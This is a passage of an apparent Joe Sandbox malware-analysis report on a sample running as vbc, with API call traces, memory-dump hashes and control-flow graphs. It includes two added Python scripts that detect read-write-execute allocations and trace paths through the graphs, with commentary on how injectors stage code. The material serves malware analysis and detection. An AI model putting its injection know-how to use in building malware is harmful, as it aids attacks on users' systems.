control_flow_graph 279 41a4fa-41a53d call 41af20 NtAllocateVirtualMemory
APIs
• NtAllocateVirtualMemory.NTDLL(00003000,?,00000000,?,0041B0F4,?,00000000,?,00003000,00000040,00000000,00000000,00409CE3), ref: 0041A539
Memory Dump Source
• Source File: 00000006.00000002.1796732782.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_400000_vbc.jbxd
Yara matches
Similarity
• API ID: AllocateMemoryVirtual
• String ID:
• API String ID: 2167126740-0
• Opcode ID: 5b9e2d1a5edd79be2a2d903e8bd7a354ba4826bc616cee076fd0fa7e3af18abb
• Instruction ID: 838264de32c343dc065a207e36573fb7d5625846ea2776db14e94fc7a3fc012b
• Opcode Fuzzy Hash: 5b9e2d1a5edd79be2a2d903e8bd7a354ba4826bc616cee076fd0fa7e3af18abb
• Instruction Fuzzy Hash: 99F01CB6200108AFDB14DF89DC55EEB77ADAF88354F154559FE099B241C630E821CBB4
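The NtAllocateVirtualMemory records above carry the values 00003000 and 00000040 in their argument list, which are the documented constants MEM_COMMIT|MEM_RESERVE and PAGE_EXECUTE_READWRITE; a fresh read-write-execute allocation is the usual first step of an unpacker or injector writing code it will jump to. The script below is an added example, not Joe Sandbox code: it parses API call records in the listing's "Name.MODULE(args), ref: addr" form and flags NtAllocateVirtualMemory calls that show that pairing. Because the IDA plugin prints a snapshot of stack values rather than a clean six-parameter list, the check looks for the constants anywhere among the arguments (an assumption; confirm the real AllocationType/Protect operands in the disassembly at the ref address, 0041A539 here). The first three sample lines are the records from this page; the fourth is constructed as a non-executable counter-example.

```python
import re
from dataclasses import dataclass
from typing import Optional

# Constructed sample input. Lines 1-3 are the API call records shown for
# process 6 (vbc) in this report; line 4 is a constructed counter-example
# (not from the report) with PAGE_READWRITE so the filter has something to reject.
SAMPLE_LINES = [
    "NtCreateFile.NTDLL(00000060,00409CE3,?,00414BA7,00409CE3,FFFFFFFF,?,?,FFFFFFFF,00409CE3,00414BA7,?,00409CE3,00000060,00000000,00000000), ref: 0041A36D",
    "NtAllocateVirtualMemory.NTDLL(00003000,?,00000000,?,0041B0F4,?,00000000,?,00003000,00000040,00000000,00000000,00409CE3), ref: 0041A539",
    "NtClose.NTDLL(00414D40,?,?,00414D40,00409CE3,FFFFFFFF), ref: 0041A475",
    "NtAllocateVirtualMemory.NTDLL(00003000,?,00000000,?,00000004,00000000), ref: 0041A600",  # constructed
]

# Documented winnt.h constants.
MEM_FLAGS = {0x1000: "MEM_COMMIT", 0x2000: "MEM_RESERVE"}
PAGE_PROT = {
    0x02: "PAGE_READONLY",
    0x04: "PAGE_READWRITE",
    0x20: "PAGE_EXECUTE_READ",
    0x40: "PAGE_EXECUTE_READWRITE",
}

# One record: ApiName.MODULE(hex,hex,?,...), ref: hexaddr
LINE_RE = re.compile(
    r"^(?P<api>\w+)\.(?P<module>\w+)\((?P<args>[^)]*)\),\s*ref:\s*(?P<ref>[0-9A-Fa-f]+)$"
)


@dataclass
class ApiCall:
    api: str
    module: str
    args: list   # hex values as ints; None where the plugin printed '?'
    ref: int     # address of the call instruction


def parse_api_line(line: str) -> ApiCall:
    """Parse one API call record as printed in the Joe Sandbox listing."""
    text = line.strip().lstrip("• ").strip()
    m = LINE_RE.match(text)
    if not m:
        raise ValueError(f"not an API call record: {line!r}")
    raw = m["args"]
    args = [] if raw == "" else [None if a == "?" else int(a, 16) for a in raw.split(",")]
    return ApiCall(m["api"], m["module"], args, int(m["ref"], 16))


def decode_flags(value: int, table: dict) -> list:
    """Expand a bitmask into the constant names from `table`, lowest bit first."""
    return [name for bit, name in sorted(table.items()) if (value & bit) == bit]


def flag_rwx_allocation(call: ApiCall) -> Optional[dict]:
    """Heuristic: NtAllocateVirtualMemory whose argument snapshot contains both
    MEM_COMMIT|MEM_RESERVE (0x3000) and PAGE_EXECUTE_READWRITE (0x40).
    Assumption: the plugin's argument list is a stack snapshot, so the constants
    are matched by value anywhere in it rather than by parameter position."""
    if call.api != "NtAllocateVirtualMemory":
        return None
    known = [a for a in call.args if a is not None]
    if 0x3000 not in known or 0x40 not in known:
        return None
    return {
        "api": call.api,
        "ref": call.ref,
        "alloc_type": decode_flags(0x3000, MEM_FLAGS),
        "protect": PAGE_PROT[0x40],
    }


def scan(lines) -> list:
    """Return one finding per RWX allocation record in `lines`."""
    findings = []
    for line in lines:
        hit = flag_rwx_allocation(parse_api_line(line))
        if hit:
            findings.append(hit)
    return findings


if __name__ == "__main__":
    for hit in scan(SAMPLE_LINES):
        print(f"RWX allocation at 0x{hit['ref']:08X}: "
              f"{'|'.join(hit['alloc_type'])} with {hit['protect']}")
```

Run as-is it reports the single record at 0x0041A539 and rejects the constructed PAGE_READWRITE line; pointing `scan` at the API lines copied from a whole listing gives a quick inventory of where a dump requests executable memory, which is where to start when locating the injected payload's entry point.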
APIs
• NtClose.NTDLL(00414D40,?,?,00414D40,00409CE3,FFFFFFFF), ref: 0041A475
Memory Dump Source
• Source File: 00000006.00000002.1796732782.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_400000_vbc.jbxd
Yara matches
Similarity
• API ID: Close
• String ID:
• API String ID: 3535843008-0
• Opcode ID: 44f4301a8312fb7a1a721bfc725db4469673ce8342a651448e83db7c9f097d31
• Instruction ID: d7bf46046ebde09780b79a3501cd22a4181f43e7f5ac81893e4249d29ed6ce1f
• Opcode Fuzzy Hash: 44f4301a8312fb7a1a721bfc725db4469673ce8342a651448e83db7c9f097d31
• Instruction Fuzzy Hash: A6E0C277240210AFD710EBE4DC45FD73BA8EF48728F154599BA589B352C234F94087D0

APIs
• NtClose.NTDLL(00414D40,?,?,00414D40,00409CE3,FFFFFFFF), ref: 0041A475
Memory Dump Source
• Source File: 00000006.00000002.1796732782.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_400000_vbc.jbxd
Yara matches
Similarity
• API ID: Close
• String ID:
• API String ID: 3535843008-0
• Opcode ID: 462dc2fd90f57a4a7913ee6487bbcc8fe2490777b3746e68c632e34f0b64e1a4
• Instruction ID: e48275ca6f7768b9f0fd4fab79f6d7fda959a909e55c262f35bdb2090c9231ed
• Opcode Fuzzy Hash: 462dc2fd90f57a4a7913ee6487bbcc8fe2490777b3746e68c632e34f0b64e1a4
• Instruction Fuzzy Hash: E5D01776200214ABD710EB99DC85EE77BADEF48764F15449ABA189B242C530FA1086E0
APIs
Memory Dump Source
• Source File: 00000006.00000002.1798598072.0000000005C10000.00000040.00001000.00020000.00000000.sdmp, Offset: 05C10000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_5c10000_vbc.jbxd
Similarity
• API ID: InitializeThunk
• String ID:
• API String ID: 2994545307-0
• Opcode ID: ea6db2784c0d7dc74fde34aafb9f192279ba2cc913be19b2e71a8031f7735759
• Instruction ID: 808d568b4cbac2c5156d71fc4bd2e9735c8668567cde485897e32bca5c7beb49
• Opcode Fuzzy Hash: ea6db2784c0d7dc74fde34aafb9f192279ba2cc913be19b2e71a8031f7735759
• Instruction Fuzzy Hash: 30900262242441525949B1584448507401697E16417D5C412A1418A50C89269956D626

APIs
Memory Dump Source
• Source File: 00000006.00000002.1798598072.0000000005C10000.00000040.00001000.00020000.00000000.sdmp, Offset: 05C10000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_5c10000_vbc.jbxd
Similarity
• API ID: InitializeThunk
• String ID:
• API String ID: 2994545307-0
• Opcode ID: a092505986dba87af60b1c437487aee0bc537f60de02cba7c0f1efad1c16da47
• Instruction ID: 50d6deea2bf6ae523e48afee3f1157474fb5a86ac7c35ad05b19d7de99486504
• Opcode Fuzzy Hash: a092505986dba87af60b1c437487aee0bc537f60de02cba7c0f1efad1c16da47
• Instruction Fuzzy Hash: 9190027220140413D51571584548707001987D1641FD5C812A0428658D9A568A52A126

APIs
Memory Dump Source
• Source File: 00000006.00000002.1798598072.0000000005C10000.00000040.00001000.00020000.00000000.sdmp, Offset: 05C10000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_5c10000_vbc.jbxd
Similarity
• API ID: InitializeThunk
• String ID:
• API String ID: 2994545307-0
• Opcode ID: 4ac67ab6269ee1707e1f406d60549c6dd33c9042df249cb30f808c3bb8989956
• Instruction ID: aa964ef03dfe610017fffb4690caceda8b0b31c9628e640f64ff8d76d3c46c7b
• Opcode Fuzzy Hash: 4ac67ab6269ee1707e1f406d60549c6dd33c9042df249cb30f808c3bb8989956
• Instruction Fuzzy Hash: 1390026A21340002D5847158544C60A001587D2602FD5D815A0019658CCD1589695326

APIs
Memory Dump Source
• Source File: 00000006.00000002.1798598072.0000000005C10000.00000040.00001000.00020000.00000000.sdmp, Offset: 05C10000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_5c10000_vbc.jbxd
Similarity
• API ID: InitializeThunk
• String ID:
• API String ID: 2994545307-0
• Opcode ID: 90e13749b7b67432d8771ff50feada2e701a522933e51a89df3354347eb954c6
• Instruction ID: 02ca9fcaff55034377b6b35033cc789fcaad08d1c6f9052789fbd81992b35f28
• Opcode Fuzzy Hash: 90e13749b7b67432d8771ff50feada2e701a522933e51a89df3354347eb954c6
• Instruction Fuzzy Hash: 6490026230140003D5447158545C6064015D7E2701F95D411E0418654CDD1589565227

APIs
Memory Dump Source
• Source File: 00000006.00000002.1798598072.0000000005C10000.00000040.00001000.00020000.00000000.sdmp, Offset: 05C10000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_5c10000_vbc.jbxd
Similarity
• API ID: InitializeThunk
• String ID:
• API String ID: 2994545307-0
• Opcode ID: 228db57c273855c5bf1b8abf58854674d7357ae065f938dfa80652f913af8122
• Instruction ID: a19eed0ac4957e0490a8bb4f693fc3e38d71d19e524ec5b10773b5bce83751c8
• Opcode Fuzzy Hash: 228db57c273855c5bf1b8abf58854674d7357ae065f938dfa80652f913af8122
• Instruction Fuzzy Hash: 2690027220140402D5047598544C646001587E1701F95D411A5028655ECA6589916136

APIs
Memory Dump Source
• Source File: 00000006.00000002.1798598072.0000000005C10000.00000040.00001000.00020000.00000000.sdmp, Offset: 05C10000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_5c10000_vbc.jbxd
Similarity
• API ID: InitializeThunk
• String ID:
• API String ID: 2994545307-0
• Opcode ID: e55122b8454afdbcb5d254faa60c289e558c5976fe7172c5012ac2d1b6cca7d5
                                                                                                                                                  • Instruction ID: af16db70e813ad41c28ffbe8d6355f5d30cfbf76bedad8833d15a33bebbff92a
                                                                                                                                                  • Opcode Fuzzy Hash: e55122b8454afdbcb5d254faa60c289e558c5976fe7172c5012ac2d1b6cca7d5
                                                                                                                                                  • Instruction Fuzzy Hash: 8D90027220148802D5147158844874A001587D1701F99C811A4428758D8A9589917126
                                                                                                                                                  APIs
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000006.00000002.1798598072.0000000005C10000.00000040.00001000.00020000.00000000.sdmp, Offset: 05C10000, based on PE: true
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_6_2_5c10000_vbc.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: InitializeThunk
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 2994545307-0
                                                                                                                                                  • Opcode ID: ccaf6a465d03aab5cb1624db85e9b8ae31fafce115579092f15e27c40acea2a6
                                                                                                                                                  • Instruction ID: 155e38ee39bceb342e811481fbca6b49fb294fa43d7d94b1bebc64bf9188e910
                                                                                                                                                  • Opcode Fuzzy Hash: ccaf6a465d03aab5cb1624db85e9b8ae31fafce115579092f15e27c40acea2a6
                                                                                                                                                  • Instruction Fuzzy Hash: 13900262211C0042D60475684C58B07001587D1703F95C515A0158654CCD1589615526
                                                                                                                                                  APIs
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000006.00000002.1798598072.0000000005C10000.00000040.00001000.00020000.00000000.sdmp, Offset: 05C10000, based on PE: true
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_6_2_5c10000_vbc.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: InitializeThunk
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 2994545307-0
                                                                                                                                                  • Opcode ID: c03aeff020a98f23ba2a507bc179435071b8c17b32e77eaee426a83cfd37ea98
                                                                                                                                                  • Instruction ID: 17be67ea3c36e631545c2faa144f4ab7366ea6edc37bfb819743fde130feea63
                                                                                                                                                  • Opcode Fuzzy Hash: c03aeff020a98f23ba2a507bc179435071b8c17b32e77eaee426a83cfd37ea98
                                                                                                                                                  • Instruction Fuzzy Hash: 7690027220180402D5047158485870B001587D1702F95C411A1168655D8A2589516576
                                                                                                                                                  APIs
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000006.00000002.1798598072.0000000005C10000.00000040.00001000.00020000.00000000.sdmp, Offset: 05C10000, based on PE: true
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_6_2_5c10000_vbc.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: InitializeThunk
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 2994545307-0
                                                                                                                                                  • Opcode ID: 7c43e90212b78d5ea94f730cca8571d8dec239fe9234d2f0f2e6ade82582b1dd
                                                                                                                                                  • Instruction ID: 3b711933bad9629d1bccd4b2c7e59b3e2ba790e113cfdb4e1a39796cc2b01be4
                                                                                                                                                  • Opcode Fuzzy Hash: 7c43e90212b78d5ea94f730cca8571d8dec239fe9234d2f0f2e6ade82582b1dd
                                                                                                                                                  • Instruction Fuzzy Hash: 8B900262601400424544716888889064015ABE2611795C521A099C650D89598965566A
                                                                                                                                                  APIs
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000006.00000002.1798598072.0000000005C10000.00000040.00001000.00020000.00000000.sdmp, Offset: 05C10000, based on PE: true
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_6_2_5c10000_vbc.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: InitializeThunk
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 2994545307-0
                                                                                                                                                  • Opcode ID: f3dc54447cf710d8f6fecd0dfaf59fae7e59b3a021ad5498301939192317209b
                                                                                                                                                  • Instruction ID: 85b5a3111344eaaeec1654c6fd17f443822b3ba58ddb9ecbe6457848c7840255
                                                                                                                                                  • Opcode Fuzzy Hash: f3dc54447cf710d8f6fecd0dfaf59fae7e59b3a021ad5498301939192317209b
                                                                                                                                                  • Instruction Fuzzy Hash: E59002A234140442D50471584458B060015C7E2701F95C415E1068654D8A19CD52612B
                                                                                                                                                  APIs
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000006.00000002.1798598072.0000000005C10000.00000040.00001000.00020000.00000000.sdmp, Offset: 05C10000, based on PE: true
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_6_2_5c10000_vbc.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: InitializeThunk
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 2994545307-0
                                                                                                                                                  • Opcode ID: 8410a451de8a36ff8f45c05d7d47505330eb77830eeca575c8a2e478fe2073ca
                                                                                                                                                  • Instruction ID: e3a8d202700b7c5bae718035108762779768c7a181e604a909b92bbae072e23c
                                                                                                                                                  • Opcode Fuzzy Hash: 8410a451de8a36ff8f45c05d7d47505330eb77830eeca575c8a2e478fe2073ca
                                                                                                                                                  • Instruction Fuzzy Hash: 5590026260140502D50571584448616001A87D1641FD5C422A1028655ECE258A92A136
                                                                                                                                                  APIs
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000006.00000002.1798598072.0000000005C10000.00000040.00001000.00020000.00000000.sdmp, Offset: 05C10000, based on PE: true
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_6_2_5c10000_vbc.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: InitializeThunk
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 2994545307-0
                                                                                                                                                  • Opcode ID: 9690150bdc4bda99abf8690304cd60b53b301006d817b9f530945bec714f0a24
                                                                                                                                                  • Instruction ID: 4d53d77d0f9b9136d0216adf34cfa9b4c82262dd21013190215ec433db4e0e35
                                                                                                                                                  • Opcode Fuzzy Hash: 9690150bdc4bda99abf8690304cd60b53b301006d817b9f530945bec714f0a24
                                                                                                                                                  • Instruction Fuzzy Hash: 9D9002B220140402D54471584448746001587D1701F95C411A5068654E8A598ED5666A
                                                                                                                                                  APIs
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000006.00000002.1798598072.0000000005C10000.00000040.00001000.00020000.00000000.sdmp, Offset: 05C10000, based on PE: true
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_6_2_5c10000_vbc.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: InitializeThunk
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 2994545307-0
                                                                                                                                                  • Opcode ID: 60e40a5936e5fd2401465fb993061debd0c33565bd24ce7144bdd77fc29f31ee
                                                                                                                                                  • Instruction ID: f367e9ff1b9af18d0be60be2734ab7583ec364b9f7e41205fc9f35c69da81347
                                                                                                                                                  • Opcode Fuzzy Hash: 60e40a5936e5fd2401465fb993061debd0c33565bd24ce7144bdd77fc29f31ee
                                                                                                                                                  • Instruction Fuzzy Hash: C390027220140802D5847158444864A001587D2701FD5C415A0029754DCE158B5977A6
                                                                                                                                                  APIs
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000006.00000002.1798598072.0000000005C10000.00000040.00001000.00020000.00000000.sdmp, Offset: 05C10000, based on PE: true
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_6_2_5c10000_vbc.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: InitializeThunk
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 2994545307-0
                                                                                                                                                  • Opcode ID: a0ffc14a8e2991e09b74a91846a5a9408c0529087396c4d02d020faf89003ce2
                                                                                                                                                  • Instruction ID: 4ef2442b7658658599a0cd96ba7a7c5f13a97e033262085e83bef142645d8ba6
                                                                                                                                                  • Opcode Fuzzy Hash: a0ffc14a8e2991e09b74a91846a5a9408c0529087396c4d02d020faf89003ce2
                                                                                                                                                  • Instruction Fuzzy Hash: 659002A220240003450971584458616401A87E1601B95C421E1018690DC9258991612A
                                                                                                                                                  APIs
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000006.00000002.1798598072.0000000005C10000.00000040.00001000.00020000.00000000.sdmp, Offset: 05C10000, based on PE: true
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_6_2_5c10000_vbc.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: InitializeThunk
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 2994545307-0
                                                                                                                                                  • Opcode ID: 9986d349b0e22c89251a1f4f170a0e82e9e96e81927ff0b0fa95b01c7f552fbd
                                                                                                                                                  • Instruction ID: d91cb254d30049a3ca67a2b821efcbb4f3dbd9468f21f990a4602dda388237d2
                                                                                                                                                  • Opcode Fuzzy Hash: 9986d349b0e22c89251a1f4f170a0e82e9e96e81927ff0b0fa95b01c7f552fbd
                                                                                                                                                  • Instruction Fuzzy Hash: 61900266211400030509B5580748507005687D6751395C421F1019650CDA2189615126
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000006.00000002.1796732782.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_6_2_400000_vbc.jbxd
                                                                                                                                                  Yara matches
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID:
                                                                                                                                                  • Opcode ID: 853c01b66d24f589df6b89bde03758f04558a5ab365de05a0f584bb7a63a4c44
                                                                                                                                                  • Instruction ID: 4f20240aff7f2371bb6e5cfcebb6b85206ba00274494e6c7b70a30fa46eb6871
                                                                                                                                                  • Opcode Fuzzy Hash: 853c01b66d24f589df6b89bde03758f04558a5ab365de05a0f584bb7a63a4c44
                                                                                                                                                  • Instruction Fuzzy Hash: 48213CB2D4420957CB25D664AD52BFF737CAB54314F04007FE949A3182F638BF498BA6
                                                                                                                                                   Control-flow Graph
                                                                                                                                                   • control_flow_graph 3 41a5f0-41a621 call 41af20 RtlAllocateHeap
                                                                                                                                                  APIs
                                                                                                                                                  • RtlAllocateHeap.NTDLL(&EA,?,00414C9F,00414C9F,?,00414526,?,?,?,?,?,00000000,00409CE3,?), ref: 0041A61D
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000006.00000002.1796732782.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_6_2_400000_vbc.jbxd
                                                                                                                                                  Yara matches
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: AllocateHeap
                                                                                                                                                  • String ID: &EA
                                                                                                                                                  • API String ID: 1279760036-1330915590
                                                                                                                                                  • Opcode ID: 5b685ba00e4f3e285a347290f69675979fbe5b3df3c61f88542a29b4b9d62cf4
                                                                                                                                                  • Instruction ID: 65e1271fa0e6f293e5ca7d904ec396d69fb6d51de338ced040ab1bfa87458b74
                                                                                                                                                  • Opcode Fuzzy Hash: 5b685ba00e4f3e285a347290f69675979fbe5b3df3c61f88542a29b4b9d62cf4
                                                                                                                                                  • Instruction Fuzzy Hash: 1DE012B2200208ABDB14EF99DC41EA777ADAF88668F118559BA085B242C630F9118AB0

                                                                                                                                                  Control-flow Graph

                                                                                                                                                   • Basic blocks: 201 = 4082d3-4082e7; 202 = 4082e9-4082fd (call 41b710); 203 = 40831e-40835a (call 41be20, 41c9c0, 40ace0, 414e40); 214 = 40835c-40836e (PostThreadMessageW); 215 = 40838e-408392; 216 = 408370-40838a (call 40a470); 217 = 40838d
                                                                                                                                                   • Edges: 201->202, 201->203, 203->214, 203->215, 214->216, 214->217, 216->217, 217->215
                                                                                                                                                  APIs
                                                                                                                                                  • PostThreadMessageW.USER32(?,00000111,00000000,00000000,?), ref: 0040836A
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000006.00000002.1796732782.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_6_2_400000_vbc.jbxd
                                                                                                                                                  Yara matches
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: MessagePostThread
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 1836367815-0
                                                                                                                                                  • Opcode ID: fa219bae15b0da85c67c1ee57d7a5492c2843938ffc609705adf7c38e76ccc51
                                                                                                                                                  • Instruction ID: cccecc87c1ea1b2e49a02ea573b714a3824719a0686cf2f5ae3b0575679c9a49
                                                                                                                                                  • Opcode Fuzzy Hash: fa219bae15b0da85c67c1ee57d7a5492c2843938ffc609705adf7c38e76ccc51
                                                                                                                                                  • Instruction Fuzzy Hash: 1F1108B2940328ABDB11A6549C02FEE3358AB84B55F05016EFF44BB2C1DBBD6D0547F5
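The control_flow_graph listings in these function records are the text form of the rendered graph: a block id, its address range, any calls made from the block, and `src->dst` edges, all run together on one line. The Python below is an added example, not part of the Joe Sandbox report or its IDA plugin; it parses that token stream back into blocks and edges and enumerates the paths from the entry block to the block that reaches a given API. The token grammar is inferred from the listings on this page, the input string is the first PostThreadMessageW graph copied from above, and the `sub_` prefix for internal call targets is this example's own naming.

```python
import re
from collections import defaultdict

# Constructed input: the flattened CFG line of the 4082d3 function, copied from the report.
CFG_TEXT = (
    "control_flow_graph 201 4082d3-4082e7 202 4082e9-4082fd call 41b710 "
    "201->202 203 40831e-40835a call 41be20 call 41c9c0 call 40ace0 call 414e40 "
    "201->203 214 40835c-40836e PostThreadMessageW 203->214 215 40838e-408392 "
    "203->215 216 408370-40838a call 40a470 214->216 217 40838d 214->217 "
    "216->217 217->215"
)

EDGE = re.compile(r"^(\d+)->(\d+)$")                      # "201->202"
RANGE = re.compile(r"^([0-9a-f]+)(?:-([0-9a-f]+))?$")     # "4082d3-4082e7" or "40838d"


def parse_cfg(text):
    """Return ({block_id: {"start", "end", "calls"}}, [(src, dst), ...]).

    Grammar assumed from the listing: <id> <range> ("call" <hex> | <ApiName>)* and
    "<id>-><id>" edge tokens, in any order after the leading "control_flow_graph".
    """
    tokens = text.split()
    if tokens and tokens[0] == "control_flow_graph":
        tokens = tokens[1:]
    nodes, edges = {}, []
    current = None
    i = 0
    while i < len(tokens):
        tok = tokens[i]
        m = EDGE.match(tok)
        if m:
            edges.append((int(m.group(1)), int(m.group(2))))
            i += 1
            continue
        if tok.isdigit() and i + 1 < len(tokens) and RANGE.match(tokens[i + 1]):
            r = RANGE.match(tokens[i + 1])          # block id followed by its address range
            start = int(r.group(1), 16)
            end = int(r.group(2), 16) if r.group(2) else start
            current = int(tok)
            nodes[current] = {"start": start, "end": end, "calls": []}
            i += 2
            continue
        if tok == "call":                            # internal call target (hex address)
            nodes[current]["calls"].append("sub_" + tokens[i + 1])
            i += 2
            continue
        nodes[current]["calls"].append(tok)          # bare name: imported API called here
        i += 1
    return nodes, edges


def entry_nodes(nodes, edges):
    """Blocks with no incoming edge, i.e. the function entry."""
    targets = {dst for _, dst in edges}
    return sorted(n for n in nodes if n not in targets)


def paths_to_api(nodes, edges, api):
    """Enumerate simple paths from each entry block to the block(s) that call `api`."""
    succ = defaultdict(list)
    for s, d in edges:
        succ[s].append(d)
    goal = {n for n, info in nodes.items() if api in info["calls"]}
    found = []

    def walk(node, path):
        if node in goal:
            found.append(path)
            return
        for nxt in succ[node]:
            if nxt not in path:                      # avoid looping on back edges
                walk(nxt, path + [nxt])

    for e in entry_nodes(nodes, edges):
        walk(e, [e])
    return found


def describe(nodes, edges):
    """Human-readable block/edge listing."""
    lines = []
    for n in sorted(nodes):
        info = nodes[n]
        span = (f"{info['start']:x}-{info['end']:x}"
                if info["end"] != info["start"] else f"{info['start']:x}")
        calls = ", ".join(info["calls"]) or "-"
        lines.append(f"block {n}: {span}  calls: {calls}")
    lines.append("edges: " + ", ".join(f"{s}->{d}" for s, d in edges))
    return "\n".join(lines)


if __name__ == "__main__":
    nodes, edges = parse_cfg(CFG_TEXT)
    print(describe(nodes, edges))
    for p in paths_to_api(nodes, edges, "PostThreadMessageW"):
        print("path to PostThreadMessageW:", " -> ".join(map(str, p)))
```

For this graph the only entry is block 201 and the single path to the PostThreadMessageW block is 201 -> 203 -> 214; block 202 is a dead end with no successor, which is the kind of early-return branch worth checking in the disassembly when a sample's anti-analysis checks are suspected to sit before the interesting call.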

                                                                                                                                                  Control-flow Graph

                                                                                                                                                   • Basic blocks: 220 = 408309-40835a (call 41be20, 41c9c0, 40ace0, 414e40); 230 = 40835c-40836e (PostThreadMessageW); 231 = 40838e-408392; 232 = 408370-40838a (call 40a470); 233 = 40838d
                                                                                                                                                   • Edges: 220->230, 220->231, 230->232, 230->233, 232->233, 233->231
                                                                                                                                                  APIs
                                                                                                                                                  • PostThreadMessageW.USER32(?,00000111,00000000,00000000,?), ref: 0040836A
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000006.00000002.1796732782.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_6_2_400000_vbc.jbxd
                                                                                                                                                  Yara matches
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: MessagePostThread
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 1836367815-0
                                                                                                                                                  • Opcode ID: 2c69c3419cb1d5e4418932444e8ffbfd0296bf9a379bc45bb6b1a052704e6f0b
                                                                                                                                                  • Instruction ID: da53683470e229f3deabd99abb76fcc4fe04895a6951e78cd3bde030695561bd
                                                                                                                                                  • Opcode Fuzzy Hash: 2c69c3419cb1d5e4418932444e8ffbfd0296bf9a379bc45bb6b1a052704e6f0b
                                                                                                                                                  • Instruction Fuzzy Hash: 8D012871A80318BBE720A6908C43FFE772C5B41B44F04015EFF04BA1C2D6A8290543EA

                                                                                                                                                  Control-flow Graph

                                                                                                                                                   • Basic blocks: 236 = 408310-40835a (call 41be20, 41c9c0, 40ace0, 414e40); 246 = 40835c-40836e (PostThreadMessageW); 247 = 40838e-408392; 248 = 408370-40838a (call 40a470); 249 = 40838d
                                                                                                                                                   • Edges: 236->246, 236->247, 246->248, 246->249, 248->249, 249->247
